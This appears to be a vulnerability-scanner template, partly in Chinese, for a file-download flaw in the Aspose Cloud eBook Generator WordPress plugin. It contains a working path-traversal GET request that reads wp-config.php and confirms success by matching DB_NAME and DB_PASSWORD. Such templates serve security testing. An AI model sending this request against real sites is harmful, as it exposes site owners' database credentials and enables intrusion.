product: WordPress
vName: Aspose Cloud eBook Generator - File Download
type: 文件读取
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://wpscan.com/vulnerability/7866
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
    verify:
      logic: and
      check:
        - body:
            value:
              - DB_NAME
              - DB_PASSWORD
            logic: and
        - status: 200
